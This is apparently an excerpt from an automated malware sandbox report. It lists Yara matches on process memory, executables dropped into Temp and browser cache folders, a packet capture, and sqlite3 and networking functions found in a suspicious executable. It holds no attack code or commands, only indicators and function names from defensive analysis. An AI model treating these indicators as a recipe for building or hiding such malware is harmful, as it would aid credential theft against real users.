Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F0C40 sqlite3_bind_zeroblob, 6_2_6C6F0C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F0D60 sqlite3_bind_parameter_name, 6_2_6C6F0D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C618EA0 sqlite3_clear_bindings, 6_2_6C618EA0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 6_2_6C6F0B40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C616410 bind,WSAGetLastError, 6_2_6C616410
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C616070 PR_Listen, 6_2_6C616070
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C61C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 6_2_6C61C050
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C61C030 sqlite3_bind_parameter_count, 6_2_6C61C030
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6160B0 listen,WSAGetLastError, 6_2_6C6160B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5A22D0 sqlite3_bind_blob, 6_2_6C5A22D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6163C0 PR_Bind, 6_2_6C6163C0